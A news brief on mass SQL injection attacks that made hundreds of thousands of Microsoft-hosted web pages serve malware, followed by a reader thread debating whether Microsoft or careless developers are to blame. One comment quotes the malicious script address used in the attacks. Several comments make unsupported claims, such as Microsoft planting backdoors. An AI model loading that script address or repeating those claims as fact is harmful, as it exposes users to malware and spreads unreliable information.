Microsoft denies fault in hacks

Microsoft is denying that a recent rash of Web server attacks are the company's fault.

In a blog posted late Friday night, Bill Sisk, of the Microsoft Security Response Center, wrote that the attacks are not due to any new or unknown security flaws in Internet Information Services or Microsoft SQL Server. Rather, he says, the attacks are made possible by SQL injection exploits, and he points Web developers to the company's list of best practices to prevent such attacks.

Ongoing attacks have affected half a million Web pages, compromising them so they serve up malware, according to several reports. The hacked sites include government sites in the U.K. and sites belonging to the United Nations.

All it takes for a computer to become infected is a visit to a compromised site. While viewing that site, the injected Javascript loads a file named 1,js. The file is located on a malicious server, which then attempts to execute eight different exploits targeting Microsoft applications.

Related story: Web 2.0, meet Internet attack 2.0

[Gomphos]

Of course!

See, it's not their fault that this particular exploit allows the file to
"[attempt] to execute eight different exploits targeting Microsoft
applications."

[Penguinisto]

This leads to a question:

Unlike PHP (in which the script coders are basically on their own), doesn't the ASP language have a big, fat build kit (actually, 'kits' and add-on modules) built and shipped by Microsoft? And don't those kits have checking against such things like, oh, SQL injection exploits?

[Vegaman_Dan]

You can lead a horse to water-

But you can't make him use the tools provided to check their own work.

As easy as it is to automatically blame Microsoft for this one, when you read the source material for this one, it's clear that the tools to prevent it were available- the coders simply didn't use them.

Since this affects Java as well, I lean more towards sloppy programming and not the provider of the tools themselves.

Should I blame Craftsman because the waterpump on my Chevy broke when I didn't use the wrenches provided to me in the kit?

[JCPayne]

Microsoft = "No it can't be our software, our software is flawless"

Right?

[timber2005]

No

Microsoft said its not due to a known or unknown flaw in the software. Meanking, for people who can't understand that, its not something thats known and being exploited, and its not something that they haven't discovered thus far.
Microsoft's business customers can send logs to Microsoft so they can track this stuff, and I'm willing to bet of the 1.8 million, they didn't just recieve five and call it not their fault.

[eferron]

Give it a break already....

What Microsoft is not saying. Microsoft has admitting that it's software can be exploited along with everyone else's. These attacks are not specific to Microsoft. Microsoft has posted all over the world that beware if you do not want to be hacked then follow these guidelines. People chose to ignore them and this is the results. Saying other vendors are better based on this is like sayihng we won't use a gas stove because it is easy to get burned, we are using electric (see no flames).

[ballmerisanape]

typical

Microsoft and its fanboys love blaming the user.

[sysopdr]

Blame in wrong direction

I know I keep saying this, and I expect to keep saying it until someone either convinces me I am wrong or the message gets through ...
Why do we in the computer industry atomatically blame the victim or the developer? Is this conditioning or our binary way of thinking or?
The real people who we should be blaming and going after is the malware writers (MalZ) and not Microsoft or Mozilla or McAffee.
We might also start blaming our governments as well for being so far behind in combatting this criminal behaviour.
When someone breaks into your house do you blame the contractor?
When someone steals your car do you blame Ford?
We have to stop this blame the developer mentality because it takes us way from what should be our main focus and that is finding and eliminating the MalZ that are attacking our systems. We need to either get our police forces to start catching these guys or we have to do it ourselves if they are unable or unwilling.

[Penguinisto]

It's a bit more complex than that...

IMHO, we will always have incompetent coders among us.

That said, there is a vast difference between languages that have little documentation and no real IDE to speak of, and a language (like, say, ASP) that have a plethora of IDE support and brags on ease-of-coding and ease-of-deployment.

So where was Microsoft when their IDE's failed to check against a simple SQL injection attack? Where was Microsoft when their bragged-on ease-of-use/ease-of-deployment language and development tools failed them utterly? Where was Microsoft? Why, they were busy blaming users for taking them at their word, that's where.

--

And there's still one other monster question at hand here.

Why is it that when a PHP script allows a PHP-based site to be pwned, the sysop merely has --at most-- to be rid of the offending script, and rebuild/restore the bits and bobs within the chrooted directories that Apache was handling at the time.

Meanwhile, this little IIS/ASP exploit apparently allows a perpetrator to [i]own the entire frickin' server[/i]. Perhaps that little bit speaks volumes on just how insecure IIS and Windows is than anything else, and blaming users for that chain of an attack is not ignorant - it's stupid.

--

Guess that, overall, Microsoft does have to eat some crow here... and maybe they won't be so cavalier about pushing their pet languages as so eay to build and deploy anymore? Heh - I'm not holding my breath.

/P

[Lee in San Diego]

Spot on!

" The real people who we should be blaming and going after is the
malware writers"

Spot on! Fire for effect!

All operating systems need to be as bullet proof as possible and
updated as necessary, but the real criminal is the criminal.

[The_Decider]

Completely off base

A more reasonable anology would be a bank vault manufacturer left in a flaw so all a burglar would have to do to crack it is kill the power or build it with such shoddy materials that 2-3 hits by a sledge hammer will break it.

Are you telling me that the vault manufacturer would not be held liable?

If someone breaks into my house and my alarm system didn't take note of it, guess who is also at fault?

That is a much closer analogy to software security than your uninformed comments. Many companies, most notably Microsoft pay lip service to employing secure coding practices, and the end results are predictable.

Unlike the alarm company, MS skates out of all financial. legal, and ethical liability.

[Vegaman_Dan]

Who is easier to blame?

It's far easier to blame a monolothic company like Microsoft or Apple than to take responsibility for your own actions or sloppy code.

Unfortunately we will have many people here who will blame the provider of the tools and not the people who failed to use them, or those that used them in a malicious way.

It's an important distinction to make in my view.

[timber2005]

AGREED

I agree 100%, its the malware creators we should be mad at.

Wow... there is some intelligence on these comments.

[Phillep_H]

Wrong

If Ford added a "feature" that allowed people to open the door, start the car, and drive off without the keys, I most certainly would blame Ford.

Especially if Ford, through predatory marketing practices, held 90% or so of the market and retail shelf space.

[t8]

Microsoft has never told a lie.

<quote>the attacks are not due to any new or unknown security flaws in Internet Information Services or Microsoft SQL Server.</quote>

Microsoft has never told a lie, so that settles it then.

[kenpm]

The fault is with bad web devs

ASP.NET has some protections against SQL injections, ASP classic does not. However, it's still up to the individual developers to make sure they sanitize user input before committing it to the database. Faulting Microsoft in this case would be like faulting the creators of C++ because some lazy developers use the language incorrectly and allow buffer overflows.

[The_Decider]

Any modern framework worth anything

Checks for buffer overflows, string format exploits, SQL injection, etc.

Granted it is not 100% effective and developers still need to be aware of these issues which is a major problem, even today. Most developers have no business writing code because they do not have the necessary background to write secure, efficient code.

Any framework worth using would have caught something as simple as this. Let me guess, the countless exploits against Windows over the years is not the fault of Microsoft either.

I fault Bjarne Stroustrep for C++. What an poorly thought out, eventually bloated beyond all reason language.

[Vegaman_Dan]

It's easier to blame Microsoft and more fun

It wouldn't be nearly as much fun if you asked people to be responsible for their own action or inactions. It's much more fun to blame the company than the users.

Unfortunately there are many people in society today that do not believe in personal resopnsibility. Some are posting here in the very story thread. Those are the scary people.

[t7c192]

Java has such flaw as well

Even Java/JSP has such flaws, and developers will have to protect against that. You can always do SQL injection on JDBC if not protected, so can't really blame MS for that.

[Vegaman_Dan]

You can blame Microsoft for anything. No logic required.

My sink trap got plugged up again with some food debris in the kitchen. Clearly that is Microsoft's fault. They took no action at all to prevent it so therefore it's their fault.

Now if I had been using an iSink, the sink would still be stopped up, but it would smell better and have interesting colors. :)

[WJeansonne]

Probably open source or Linux miscreants

Their hatred of Microsoft runs deep, like most open source fanatics and Linux enthusiasts.

[System Tyrant]

Damn miscreants

It was probably people who have nothing better to do than attack servers to feel good about themselves. Microsoft just seems to be an a)easier target, b)just more fun to go after.

[The_Decider]

LOL

Script kiddies using windows based tools are the people doing most of the exploits. This kids probably don't even know what Linux is.

Your comments are laughable.

[richto]

No itsa probably all those insecure Linux websites.

Its probably coming from all those Linux sites running PHP and My SQL. They have been like swiss cheese for years.

[Stating]

1.8 Million Infected Sites!

Google this: "1,js". This is a national security risk.

Huge number of infected sites:
THE UNITED NATIONS (events.un.org/Edetail.asp?EventID=1055&BeginDate=1/22/2007)
United Methodist Church, Harcourt Publishers,
Bahrain Oil and Gas, West Virginia Wesleyan College, e-law, Wyoming Ranch Vacations, Wine Bars, Podcasts, Capacitor sales, Water Heater sales, Toyota dealers, RV parks, chiropracters, etc.

Here's a choice discussion:

"The script -www.nihaorr1.com/1.js is getting inserted into every record of my organizations SQL db. I'm the accidental techie in my office, and I'm clueless as to the vulnerability in our code. After a restore, the site gets hit every other day. I've searched around and no one seems to have an answer to this specific problem. There's no doubt in my mind that our coding has a loophole in it somewhere, but I'm not sure what to look for."

[The_happy_switcher]

Typical microsoft response, blame the end user

. And treat it's users like idiots.

[bemenaker]

Try reading the article

The blame is on the web developers, not the end user

[Vegaman_Dan]

Source before commenting

I read the story posted on CNET and the source material that they used to write the story which is also online.

Microsoft didnt blame anyone for it. In fact, nobody was blaming Microsoft either. Both stories made it very clear that the exploit was done through poorly written/tested code on web pages that is user created.

Give Microsoft some time today (Monday) to get their act together so they can blame end users- they haven't had time to even respond to this yet. THEN you can get all up in arms about it. :)

[itraveler]

Microsoft "WHAT? ME?!!"

If these clowns spent more time on security and less time figuring how to make us run their D@#N GENUINE ADVANTAGE crapware every hour... maybe these holes would be patched by now.

Now the classic response... "Oh yea, everybody knows there is a hole there"...

[Kev Orng]

preying on the default

This is why I always try to encourage ecological diversity with family, friends and coworkers. I don't care if you prefer Windows, Mac, Linux; IE, Firefox, Safari, Flock, Opera; Outlook, Thunderbird, Entourage... The important thing is that you try or at least look into the alternatives rather than just accepting the default; then these hacks and viruses and malware will not have such wide-ranging repercussions, simply because they can't spread as far or as fast, because they can't interbreed.

Just like in the real world; if you only have one kind of honeybee, then a honeybee virus can wipe out the whole population.

So yeah, if you prefer Windows, more power to you; but at least introduce a bit of genetic diversity into the system by using one of the many alternative browsers and email clients. Thanks.

I use a Mac with a Safari/Flock browser combo.

[gggg sssss]

mySQL and php

can be owned with SQL injection just as easiliy. Neither are MS products

[FutureGuy]

I got hacked, MS's fault

Someone logged into my computer and hacked it. How could they guess my blank password, had to be MS's fault. For those who don?t know what a SQL injection attack is read up before pointing fingers. SQL injection is a result of bad programming and every website is vulnerable to stupid programmers.

[The_Decider]

LOL

Too bad the way MS stores passwords makes it several orders of magnitudes easier to crack than the exact same password stored in Linux.

[rcrusoe]

It is the user's fault

Anyone with any knowledge of Microsoft's security record should know that the only place for a Windows computer is behind a strong firewall with no access to the Internet.

[deadteck]

Take the finger pointing an shove it!!

The thing that gets me with people, they are so quick to point the finger at everything, but the real problem. The porblem isn't the developer of the website or the software developer, its the morons who don't have anything better to do(or to slack to get a real job) with there lives and spend countless hours writing code to try and ruin someone else's day. That is were the finger pointing needs to go. Web dev and software dev isn't the easiest of jobs, nor is anything perfect. So for those of you wanting to point the finger at one or the other use some DAMN common sense.

[notgonnatellya]

Your premise is false

The people doing this type of thing aren't slackers trying to ruin your day. That's so 10 years ago.

These days, most malware is developed by talented developers, engineers and a few architects who work in criminal organizations.

So, yes, it is the developer's fault. Now there are some things that you can't anticipate, but following coding guidelines that are provided by MS (assuming that's who wrote the OS/Server/Dbase used), is just common sense.

[tech_no_man]

When people point fingers . . . . . . .

When people point fingers there are four pointing back at you. Normally I would be on Microsoft's back on this, But they are not at fault here.

What happens is that most programmers, web programmers and such learn programming by the seat of their pants, self taught, no formality, no security in mind. Then they never learn to program by "Best Practices". They learn to program for "whatever works", which usually is not secure methods. If IT is given the tools and informed not to program this way or the other by the manufacture because it will cause problems, then the fault belongs to the programmer and end user if they use methods not advised.

The "anything" goes has to stop being "the best practice". Sloppy programming has to stopped by the end user and programmer.

[chash360]

I said it a million times, turn off scripting!

I won't blame this one on M$ directly, but indirectly I will. Who started the whole scripting craze? M$ did. This was in direct violation of the most basic DOD security protocol on the Intenet before it went to the mainstream.

That Security Protocol: DO NOT EVER EXECUTE ARBITRARY CODE FROM A REMOTE SOURCE EVER!

(doing so in the past when it was DOD's network would have gotten your security clearance revoked, court marshall, and perhaps some fingers removed ;-()

Even if you trust the source, you cannot trust the connection! someone slices the line mid-transfer and garbage collects on it, you have no idea what your computer might do with that garbage if executed!

The only code that should be executed on any computer (networked or not) is code that is tested, and proven safe on that physical system. You should always do this in isolation from the network first, and then test in isolated network environment, before daring to run that code while connected on the Internet.

Client Side Scripting, be it VB Script, ActiveX control, Java, Flash, Perl, etc. completely violates this, but the world is hooked on this scripting drug, and won't detox, or go to rehab.

The original HTML spec was not vunerable to this because it is a Markup Language not a programming language. It was designed intentionally that way so as to prevent this from happening, because back in the good old days, when the Internet was mostly SMTP, NNTP, HTML and IRC, we knew better than to execute arbitrary remote code!

Maybe I need to go into the IT Security Field because appearently there is not a single intelligent person (with integrity) working in it now, or else they would have told management that scripting is not safe ever!

(but I always suspected that the reason client side scripting actually got out there was that they wanted this insecurity, which is why I have refused that field).

[jasmred]

The REAL fault lies with TCP/IP

Having worked in universities where the GURUs kept telling me that MS knows NOTHING about networking and that the best way to do networking was TCP/IP I have to ask them; "How the hell did they (the egghead academics) allow a protocol that has NO security attributes built into the basic framework to become the backbone of modern communications?"

It was the US military and the Standards Organisations that developed this junk heap and the university "free love" attitudes that propogated it around the world...

What a joke.

I remeber using Blackcomb (go and look up your history books) that was secure and worked really quickly over a 1440 baud dial-up link. It was revolutionary stuff - guess who? Microsoft - of course!

[Melekai]

targeting Microsoft applications.

'nuff said.

[as901]

Microsoft is to blame.

Mycrosoft has a lomg standing belief that once you place Windows in your computer ,"Microsoft has a right to access your computer and disable it at will!"

Because of this belief ,mycrosoft always leaves a "backdoor" way for them to access your computer. If they believe that you do not have the legal right to their software ,they can disabled your computer.

To do this trick requires a method to remotely access your computer. When Hackers find that way Microsoft offers "security updates" that close that backdoor and open another.

Many people with legal copies of Windows have suffered Microsofts anger. They may have purchased a legal copy from a friend ,or they may have purchased a legal copy from a company that went under.

It is Microsoft policy to assume guilt. If you are not the one who it was registered to from the beginning ,if you go to their update section ,you may find your computer ,or part of your computer no longer working.

As if that is not bad enough ,Microsoft leaves our systems open and at risk ,so they may inspect our systems at will.

I use Linux. I do so for two reasons. The first is the stable nature of Linux. The second reason is my belief that my computer is my own property , and Microsoft does not have a right to examine or alter my computer ,if they so choose.

Mark Heinemann

[alegr]

OK

Now put your tin foil hat back on. Make sure to give your daily prayer to the holy church of Invincible U-x. Blessed be poor souls.
Damned forever be those security lists, spreading unspeakable heresies about U-x flaws, such as www.matasano.com.